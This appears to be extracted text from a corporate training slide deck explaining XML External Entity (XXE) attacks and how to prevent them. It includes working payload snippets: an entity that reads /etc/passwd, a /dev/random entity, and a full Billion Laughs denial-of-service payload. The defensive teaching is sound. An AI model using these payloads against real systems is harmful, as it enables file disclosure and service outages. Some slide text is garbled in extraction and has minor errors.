A4 – XML

EXTERNAL
ENTITY (XXE)
ATTACK

© 2020 Nexusguard Limited – Confidential & Proprietary

A4 – XML External Entity (XXE) Attack
An XML external entity is a URL, typically to a local file or web service, or a local variable within the XML
document, many XML parser have XXS enabled by default particularly Java XML Parser and most
common mistakes is developers don’t even know XML document supports external entities, they accept
an XML document from untrusted source, Process the XML document with XML parser enabled by
default.

Applications and in particular XML-based web services or downstream integrations might be vulnerable
to attack if:
• The application accepts XML directly or XML uploads, especially from untrusted sources, or inserts
untrusted data into XML documents, which is then parsed by an XML processor.
• If your application uses SAML for identity processing within federated security or single sign on
(SSO) purposes. SAML uses XML for identity assertions, and may be vulnerable.
• If the application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities
are being passed to the SOAP framework.
• Being vulnerable to XXE attacks likely means that the application is vulnerable to denial of service
attacks including the Billion Laughs attack.

© 2020 Nexusguard Limited – Confidential & Proprietary

Entities
String macros sample: <!ENTITY compname “My Company”>

• Directly defining the company name, and you can reference that company to different places and that can be a repetition of the data
which can be easier to inject other data

Nested:<!ENTITY dname “&compname; Web Division”>

• One of the vulnerability here is that you can nest, which means the dname is the company name, and one of the problem is that you could
nest this things arbitrarily deep, that could quickly become the problem

External: <ENTITY price SYSTEM “https://website.com/:>

• This entity provides a lot of flexibility to the company that use XML, that might the company have a multiple servers and needs to provide
the data the company’s need, this entity allows the company to full-in something from another server it could be a HTTP, URI, etc…

OS: <!ENTITY price SYSTEM “file:///etc/passwd”>

• It also allows operating system calls, that can set/view a password file which has a privilege, any file from the server would be valid as XML
Entity

OS: <!ENTITY price SYSTEM “file://dev/random”>

• The last example is rather that calling a data file to display in your browser, you can use a “/dev/random” potentially an endless file, and if
you try to include this on a XML file it could result to Denial of Service Attack or Buffer Overflow

© 2020 Nexusguard Limited – Confidential & Proprietary

Valid XML
Entity

© 2020 Nexusguard Limited – Confidential & Proprietary

Malicious XXE
to extract the
contents from
the system file
/etc/passwd

© 2020 Nexusguard Limited – Confidential & Proprietary

© 2020 Nexusguard Limited – Confidential & Proprietary
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)> Malicious XXE
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> to launch
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> denial-of-
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> service attack
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> by exhausting
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> system
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> resources
]>
<lolz>&lol9;</lolz>

© 2020 Nexusguard Limited – Confidential & Proprietary

A4 – XML External Entity (XXE) Attack: Prevention
Developer training is essential to identify and mitigate XXE. Besides that, preventing XXE requires:

• Whenever possible, use less complex data formats such as JSON, and avoiding serialization of
sensitive data.
• Patch or upgrade all XML processors and libraries in use by the application or on the underlying
operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.
• Disable XML external entity and DTD processing in all XML parsers in the application, as per the
OWASP Cheat Sheet 'XXE Prevention'.
• Implement positive ("whitelisting") server-side input validation, filtering, or sanitization to prevent
hostile data within XML documents, headers, or nodes.
• Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or
similar.
• SAST tools can help detect XXE in source code, although manual code review is the best
alternative in large, complex applications with many integrations.
• If these controls are not possible, consider using virtual patching, API security gateways, or Web
Application Firewalls (WAFs) to detect, monitor, and block XXE attacks.

© 2020 Nexusguard Limited – Confidential & Proprietary